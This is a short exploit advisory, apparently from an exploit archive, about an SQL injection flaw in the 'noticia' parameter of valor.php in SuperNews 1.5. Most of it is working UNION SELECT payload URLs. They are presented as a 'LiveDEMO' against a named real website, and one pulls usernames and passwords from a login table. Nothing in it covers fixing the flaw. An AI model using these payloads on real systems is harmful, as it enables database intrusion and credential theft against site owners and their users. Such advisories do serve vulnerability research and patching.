id: 4950
date: 03/23/2009
title: SuperNews 1.5 (valor.php noticia) SQL Injection Vulnerability
author: p3s0k!
cves: 

=============================================================
SuperNews 1.5 (valor.php noticia) SQL Injection Vulnerability
=============================================================


#############################################################
SuperNews 1.5 SQL Injection in valor.php
#############################################################


###################################################
#[~] Author :  p3s0k!
#[~] Terminal Hacker Team
###################################################

Example:
http://www.avhsj.com.br/noticias/valor.php?noticia=[SQL-Injection]


LiveDEMO:

http://www.avhsj.com.br/noticias/valor.php?noticia=-1+union+select+0,1,2,database(),4,5--
http://www.avhsj.com.br/noticias/valor.php?noticia=-1+union+select+0,1,2,user,pass,5+from+login--



##############################



#  0day.today [2023-03-27]  #